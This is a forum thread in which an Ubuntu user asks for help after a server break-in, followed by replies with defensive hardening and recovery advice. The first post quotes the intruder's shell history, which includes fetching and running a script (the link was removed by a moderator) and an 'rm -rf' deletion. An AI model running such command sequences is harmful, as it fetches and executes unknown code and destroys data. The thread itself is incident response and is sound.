Page 1 of 2 12 LastLast
Results 1 to 10 of 15

Thread: I've been hacked

  1. #1
    Join Date
    Aug 2006
    Location
    Oz
    Beans
    Hidden!
    Distro
    Ubuntu

    I've been hacked

    Hi everyone,

    My server has been hacked.

    I noticed that I couldn't access its files remotely, so had a closer look. There were no files in my home folder.

    I looked at the log of commands, and this is what I found.

    sudo su
    pwd
    ls -a
    w
    id
    uname -a
    wget <some file>
    unzip root.txt.zip
    perl root.txt
    ls
    id
    rm -rf*
    exit -0

    Does anyone have any advice? How did they get my password after inputting 'sudo su'? Should I reinstall the OS? Is there anything I can do to safeguard against this in the future? Is this a bot or human?

    I know it's too late this time, but I don't want this to happen again, to me or anyone.

    All comments appreciated.

    Thanks
    Last edited by mörgæs; September 26th, 2013 at 12:15 PM. Reason: Removed link to possibly malicious file

  2. #2
    hakermania's Avatar
    hakermania is offline Τώρα ξέρεις τι γράφω εδώ!
    Join Date
    Aug 2009
    Location
    Greece
    Beans
    1,704
    Distro
    Ubuntu Development Release

    Re: I've been hacked

    I am very sorry that this happened to you. I hope you had everything backed up. This is the worst type of hackers: Logging in, deleting as many things as they can and then they log off. Probably without any good reason.

    I guess that you took the commands from ~/.bash_history file? Weird that the hacker did not logged in twice to wipe out the file so as to hide the commands from you.
    Please mention that for root the commands are saved under /root/.bash_history, so if the "sudo su" command was successful any commands run by the su session will be under /root/.bash_history

    But, from my point of view, the first "sudo su" was unsuccessful (maybe the user he was logged in from could not become root using this way) so he downloaded an exploit using wget and tried to run it so as to gain root privileges. If he had been successful I think that he would wipe out the whole filesystem, not just the home folder of yours. That makes me believe that his try to gain root privileges was unsuccessful.

    As to what gave him access to your server, who knows? There are way too many ways to attempt to access a server, from SQL injection, brute force attacks, XSS and the list goes on. I don't know many things about server configuration etc but I guess that there will be somewhere a log which may say something interesting.
    Website

    Wallch (Wallpaper Changer): Sourceforge | Launchpad

  3. #3
    Join Date
    Aug 2006
    Location
    Oz
    Beans
    Hidden!
    Distro
    Ubuntu

    Re: I've been hacked

    Thanks for your advice. I think you're right.

    I need to boost security.

  4. #4
    Join Date
    Aug 2009
    Location
    Makati City, Philippines
    Beans
    2,270
    Distro
    Xubuntu 16.04 Xenial Xerus

    Re: I've been hacked

    Make the server offline immediately. If you have backup on your data, reinstall everything so that you can make the server online again with minimal downtime.
    I always enable the firewall and only allow ssh by default on all server deployments. You can change the port of the ssh and disable root login and then use a secure password. It can be enough on a not so popular/not busy web server.

  5. #5
    Join Date
    Jul 2013
    Location
    Wisconsin
    Beans
    3,941

    Re: I've been hacked

    Nerdtron is right:
    - Take your server offline *immediately*
    - Complete reinstall. You don't know what other surprises are lurking.
    - Restore data from pre-hack backups. Do not try to preserve the data on your compromised system.

    Use ssh keys instead of passwords on an internet-facing server.

    See https://help.ubuntu.com/12.04/serverguide/security.html
    Last edited by ian-weisser; September 27th, 2013 at 12:28 AM.

  6. #6
    Join Date
    May 2012
    Beans
    248
    Distro
    Ubuntu 12.04 Precise Pangolin

    Re: I've been hacked

    Also, don't use the ssh default external port 22 on your router for port forwarding, use something higher than 9000.

    My server was continually bombarded with access attempts & I realised it was probably just a matter of time before someone got in.

    Since I changed it to a port above 9000, all went quiet. I also installed denyhosts, there are other programs too.

  7. #7
    Join Date
    Mar 2013
    Beans
    116

    Re: I've been hacked

    Also give them something to do. Install a honeypot and forward 22 to it. Its designed to capture what the hackers try to do.

  8. #8
    Join Date
    Jun 2011
    Beans
    414
    Distro
    Ubuntu 12.04 Precise Pangolin

    Re: I've been hacked

    Quote Originally Posted by ian-weisser View Post
    Nerdtron is right:
    - Take your server offline *immediately*
    - Complete reinstall. You don't know what other surprises are lurking.
    - Restore data from backups. Do not try to preserve the data on your compromised system.

    Use ssh keys instead of passwords on an internet-facing server.

    See https://help.ubuntu.com/12.04/serverguide/security.html
    First two points are ok but with the third one I have a problem: how does the OP knows that his/her backups are not altered and after a clean install those modifications get back on the system?? The best would be to make a copy of the hacked system which can be usefull for computer forensic and install a clean system in a controlled environment and after updates to use something like AIDE (http://www.securitytube.net/video/4963) and keep the log files at a place which are not reachable from the Internet (on usb stick in a safe). Maybe this is useful.

  9. #9
    Join Date
    Jul 2013
    Location
    Wisconsin
    Beans
    3,941

    Re: I've been hacked

    Quote Originally Posted by Gyokuro View Post
    how does the OP knows that his/her backups are not altered and after a clean install those modifications get back on the system??
    Good point. Clarified above to restore data from pre-hack backups.

  10. #10
    Join Date
    Aug 2009
    Beans
    Hidden!

    Re: I've been hacked

    Quote Originally Posted by Mahyar View Post
    There were no files in my home folder. (..) Should I reinstall the OS?
    If there were no files left in your home directory but the rest of the files are there then their attempt to gain root may have not met with success.
    This should not automagically mean you're safe: only the result from investigating the cause and assessing damages should count.
    Let us know if you would like to do that.


    Quote Originally Posted by Mahyar View Post
    Is there anything I can do to safeguard against this in the future?
    To start with:
    - Read your distributions documentation,
    - Read your distributions security documentation,
    - Install only the software you need -=[ now ]=-,
    - Update software when updates are released,
    - Disable services that are unused or easy to gain entry with,
    - Restrict access to services wherever possible,
    - Don't use simple passwords,
    - Use pubkey auth only for SSH access,
    - Enable proactive measures where possible,
    - Ensure you regularly audit your machine.
    Last edited by unspawn; September 27th, 2013 at 07:29 AM. Reason: //

Page 1 of 2 12 LastLast

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •